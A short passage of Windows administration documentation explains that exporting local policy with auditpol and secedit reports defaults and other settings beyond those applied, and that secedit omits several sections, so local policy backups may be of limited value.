ALSO NOTE: if you apply settings to local policy and then export local policy, the security template and advanced auditing portions of the exported policy will almost certainly be different from the policy you applied. “Auditpol.exe /backup” reports all advanced auditing settings, not just the ones you applied. Similarly, “secedit.exe /export” reports most local security settings whether they were defaults, applied through a security template, or changed through other means. Secedit.exe also has some other quirks. For example, it won’t report user rights assignments that are empty, and reports only a subset of the sections that might appear in a security template. It won’t report file security settings, registry security settings, service settings, or restricted groups. For these reasons, local policy backups might be of limited value.